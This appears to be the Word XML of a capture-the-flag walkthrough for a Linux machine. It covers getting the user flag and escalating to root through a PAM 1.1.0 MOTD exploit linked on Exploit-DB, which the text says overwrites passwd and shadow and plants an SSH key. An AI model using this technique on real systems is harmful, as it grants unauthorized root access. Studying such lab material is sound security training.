    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First thing I do is upgrade my shell to tty</w:t>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581400" cy="400050"/>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581400" cy="400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B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking around /www, I find nothing too useful at first glance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pP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w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Going to /home, I can access user george’s home and get the user flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking through george’s files some more, we find a directory called “.cache” containing the file “motd.legal-displayed”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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810125" cy="704850"/>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8101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685925" cy="333375"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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685925" cy="333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6">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking up an exploit for “MOTD” shows there is one with PAM version 1.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To search for the version of PAM, do the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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dpkg -l | grep -i pam</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685800"/>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810250" cy="68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E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see we have PAM v. 1.1.0 and so we can use the exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/14339</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Going through this exploit, it only needs to be on the machine to get root. First it makes a backup of some file and if the exploit fails the backup is restored. Otherwise a ssh key is generated and placed into the authorized keys folder, then the passwords are placed into passwd and shadow files to get root. It overwrites their passwords in other words.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>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371850" cy="2000250"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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371850" cy="2000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6">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rooted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4.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/14339"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22.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